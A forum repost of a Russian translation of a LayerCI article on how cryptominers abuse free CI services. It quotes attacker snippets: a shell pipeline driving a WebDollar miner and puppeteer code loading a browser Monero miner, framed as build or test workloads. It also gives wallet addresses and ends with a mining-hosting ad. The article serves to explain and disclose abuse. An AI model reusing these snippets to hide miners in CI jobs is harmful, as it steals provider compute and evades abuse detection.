[Информационная безопасность, Системы сборки, Криптовалюты] Как криптомайнеры убивают бесплатные CI (перевод)
Автор
Сообщение
news_bot ®
Стаж: 6 лет 9 месяцев
Сообщений: 27286
СI-платформы, такие как LayerCI, GitLab, TravisCI, и Shippable ухудшают, а то и вовсе закрывают свои бесплатные сервера из-за атак с целью скрытого майнинга. 1 сентября 2020 года GitLab объявил что ограничивает бесплатное использование CI в ответ на «эксплуатацию». Два месяца спустя TravisCI анонсировал схожие ограничения из-за «серьезных злоупотреблений». В это же время возросла рыночная капитализация добываемых криптовалют.
Рыночная капитализация криптовалюты подскочила со 190 млрд до 2 трлн за один год.Эти события связаны между собой: поскольку рыночная капитализация криптовалюты выросла с 190 млн. долларов в январе 2020 до 2 триллионов в апреле 2021, злоумышленникам стало выгодно атаковать бесплатные сервера PaaS провайдеров.КонтекстВ LayerCI мы помогаем разработчикам создавать полнофункциональные веб-сайты, создавая среды предварительного просмотра и автоматически запуская для них E2E тесты. Это называется CI (Непрерывная интеграция). Поскольку разработчики могут запускать на наших серверах произвольный код, они часто нарушают условия обслуживания для того, чтобы запускать майнеры криптовалюты в качестве «этапа сборки» для своих веб-сайтов. Подробнее можно прочитать тут.717 GitHub коммитов за один месяц«testronan» – заядлый пользователь Flask. Каждый час он делает коммит в своем единственном GitHub репозитории: «testronan/MyFirstRepository-Flask». Продуктивный программист, безусловно, должен убедиться в том, что внесенные им изменения хорошо протестируются. Поэтому его репозиторий содержит конфигурации аж для пяти разных CI-платформ: TravisCI, CircleCI, GitHub Actions, Wercker, и LayerCI.Похоже он довольно опытен в написании скриптов. Его СI таски запускают «listhen.sh»: shell скрипт, который объединяет сложный NodeJS скрипт с, на первый взгляд, случайными числами:
(sleep 10; echo 4; sleep 2; echo "tex.webd";sleep 2; echo 7; sleep 1; echo 1; sleep 1; echo "exit"; sleep 2) | stdbuf -oL npm run commands
MyFirstRepository-Flask не имеет ничего общего с Flask или веб-серверами. В нем размещены скрипты для майнинга криптовалюты, которые отправляют WebDollars (прим. криптовалюта) на анонимный адрес. Числа соответствуют настройкам реализации WebDollar на NodeJS.Репозиторий не атакует GitHub напрямую, вместо этого он злоупотребляет функцией «cron» для создания нового коммита каждый час и майнинга WebDollar на четырех оставшихся платформах.При пиковой апрельской цене WebDollar в 0.0005 долларов репозиторий зарабатывал 77 долларов в месяц – значительная для многих стран сумма, особенно учитывая, что для заработка необходим лишь ноутбук и интернет-соединение.
Два кошелька, на который приходит добытая криптовалюта:
- https://www.webdscan.io/address/WEBD%24gBJhmuwat3kvP2@%232E4K2zXX967grh9L43%24
- https://www.webdscan.io/address/WEBD%24gCszFRxzuMDbyNXnCXszoB2aIMSuV9kgbb%24
Майнинг криптовалюты в браузереПользователь «vippro99» описывает свои намерения менее изящно. Из десятков репозиториев большинство связано либо с криптовалютой либо с автоматизацией браузера. Репозиторий nodejs-monney содержит различные скрипты для запуска экземпляров Chrome c популярным гугловским puppeteer project.Идея проста: майнинг криптовалюты непосредственно в CI довольно легко обнаружить (например, с помощью анализа исполняемого содержимого), но автоматизация браузера – это обычная рабочая нагрузка в CI.
puppeteer.launch({ headless: true, args: ['--no-sandbox', '--disable-setuid-sandbox', '--window-size=500,500', '--user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36' ] }).then(async browser => {
console.log('-- Running chrome!!');
const page = await browser.newPage();
await page.goto('https://vippro99.github.io/-meocoder-nodejs-tool/index.html');
page.on('console', (msg) => console.log(msg.text()));
await page.waitForTimeout(((Math.floor(Math.random() * 6) + 52) * 60) * 1000);
await browser.close();
})
Данный GitHub Pages веб-сайт содержит простой браузерный майнер криптовалюты Monero, напоминающий Coinhive.На момент написания аккаунт атаковал JFrog's Shippable CI, которая (возможно, в связи с этим) анонсировала об окончании поддержки бесплатных серверов в начале этого года.Судя по комментариям «vippro99», он проживает во Вьетнаме. При текущей цене Monero, каждый экземпляр майнера на Shippable приносит 2.5 доллара в месяц, поэтому поддержание 60 экземпляров равносильно полному рабочему дню в этой стране.Решение проблемыEthereum, вторая по популярности криптовалюта, недавно объявила о планах прекращения поддержки майнинга на основе вычислений, полностью переключившись на модель Proof-of-Stake (PoS). Помимо негативного воздействия традиционного «proof-of-work» майнинга на окружающую среду, существуют и другие неприятные аспекты: мировая нехватка графических процессоров и атаки на CI-платформы.Провайдеры будут делать все возможное, чтобы обеспечить соблюдение условий обслуживания, но пока атаки выгодны и трудноотслеживаемы, они будут приобретать все более изощренный характер. Единственный долгосрочный способ и дальше пользоваться бесплатными серверами в Heroku, Netlify и GitHub – это отказ от «proof-of-work».Дата-центр ITSOFT — размещение и аренда серверов и стоек в двух дата-центрах в Москве. За последние годы UPTIME 100%. Размещение GPU-ферм и ASIC-майнеров, аренда GPU-серверов, лицензии связи, SSL-сертификаты, администрирование серверов и поддержка сайтов.Правильно и недорого майнить криптовалюту можно в майнинг-отеле https://itsoft.ru/data-center/mining/
===========
Источник:
habr.com
===========
===========
Автор оригинала: Colin Chartier
===========Похожие новости:
- [Информационная безопасность, Исследования и прогнозы в IT] Инъекция обмана: вакцины от COVID-19 в мошеннических кампаниях
- [Исследования и прогнозы в IT] Исследование актуальных потребностей IT-служб
- [Информационная безопасность, Разработка веб-сайтов, GitHub] GitHub блокирует FLoC от Google на всех страницах, кроме кастомных доменов
- [Информационная безопасность, Искусственный интеллект, Транспорт] Шереметьево раскрыл детали работы системы идентификации пассажиров по лицу
- [Информационная безопасность, Законодательство в IT, Смартфоны, IT-компании] Cellebrite обновила ПО комплекса для взлома смартфонов после его взлома разработчиком Signal
- [Информационная безопасность, IT-компании] Почему ваш бизнес может быть разрушен
- [Программирование, Big Data, Конференции] Мозги на переплавку: обзор конференции Data Fusion
- [Информационная безопасность, Законодательство в IT, IT-компании] Криптовымогатели получили данные американской полиции и угрожают раскрыть ее информаторов
- [Научно-популярное, Космонавтика, Будущее здесь] У Perseverance появится коллега – в мае Китай планирует высадку своего марсохода
- [Финансы в IT, Криптовалюты, IT-компании] Tesla продала часть биткойнов и заработала 101 млн $
Теги для поиска: #_informatsionnaja_bezopasnost (Информационная безопасность), #_sistemy_sborki (Системы сборки), #_kriptovaljuty (Криптовалюты), #_kriptovaljuta (Криптовалюта), #_majning (Майнинг), #_skrytyj_majning (Скрытый майнинг), #_webdollar, #_monero, #_continuous_integration, #_gitlab, #_ci, #_blog_kompanii_itsoft (
Блог компании ITSOFT
), #_informatsionnaja_bezopasnost (
Информационная безопасность
), #_sistemy_sborki (
Системы сборки
), #_kriptovaljuty (
Криптовалюты
)
Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете прикреплять файлы к сообщениям
Вы не можете скачивать файлы
Текущее время: 22-Ноя 06:18
Часовой пояс: UTC + 5
Автор | Сообщение |
---|---|
news_bot ®
Стаж: 6 лет 9 месяцев |
|
СI-платформы, такие как LayerCI, GitLab, TravisCI, и Shippable ухудшают, а то и вовсе закрывают свои бесплатные сервера из-за атак с целью скрытого майнинга. 1 сентября 2020 года GitLab объявил что ограничивает бесплатное использование CI в ответ на «эксплуатацию». Два месяца спустя TravisCI анонсировал схожие ограничения из-за «серьезных злоупотреблений». В это же время возросла рыночная капитализация добываемых криптовалют. Рыночная капитализация криптовалюты подскочила со 190 млрд до 2 трлн за один год.Эти события связаны между собой: поскольку рыночная капитализация криптовалюты выросла с 190 млн. долларов в январе 2020 до 2 триллионов в апреле 2021, злоумышленникам стало выгодно атаковать бесплатные сервера PaaS провайдеров.КонтекстВ LayerCI мы помогаем разработчикам создавать полнофункциональные веб-сайты, создавая среды предварительного просмотра и автоматически запуская для них E2E тесты. Это называется CI (Непрерывная интеграция). Поскольку разработчики могут запускать на наших серверах произвольный код, они часто нарушают условия обслуживания для того, чтобы запускать майнеры криптовалюты в качестве «этапа сборки» для своих веб-сайтов. Подробнее можно прочитать тут.717 GitHub коммитов за один месяц«testronan» – заядлый пользователь Flask. Каждый час он делает коммит в своем единственном GitHub репозитории: «testronan/MyFirstRepository-Flask». Продуктивный программист, безусловно, должен убедиться в том, что внесенные им изменения хорошо протестируются. Поэтому его репозиторий содержит конфигурации аж для пяти разных CI-платформ: TravisCI, CircleCI, GitHub Actions, Wercker, и LayerCI.Похоже он довольно опытен в написании скриптов. Его СI таски запускают «listhen.sh»: shell скрипт, который объединяет сложный NodeJS скрипт с, на первый взгляд, случайными числами: (sleep 10; echo 4; sleep 2; echo "tex.webd";sleep 2; echo 7; sleep 1; echo 1; sleep 1; echo "exit"; sleep 2) | stdbuf -oL npm run commands
Два кошелька, на который приходит добытая криптовалюта:
puppeteer.launch({ headless: true, args: ['--no-sandbox', '--disable-setuid-sandbox', '--window-size=500,500', '--user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36' ] }).then(async browser => {
console.log('-- Running chrome!!'); const page = await browser.newPage(); await page.goto('https://vippro99.github.io/-meocoder-nodejs-tool/index.html'); page.on('console', (msg) => console.log(msg.text())); await page.waitForTimeout(((Math.floor(Math.random() * 6) + 52) * 60) * 1000); await browser.close(); }) =========== Источник: habr.com =========== =========== Автор оригинала: Colin Chartier ===========Похожие новости:
Блог компании ITSOFT ), #_informatsionnaja_bezopasnost ( Информационная безопасность ), #_sistemy_sborki ( Системы сборки ), #_kriptovaljuty ( Криптовалюты ) |
|
Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете прикреплять файлы к сообщениям
Вы не можете скачивать файлы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете прикреплять файлы к сообщениям
Вы не можете скачивать файлы
Текущее время: 22-Ноя 06:18
Часовой пояс: UTC + 5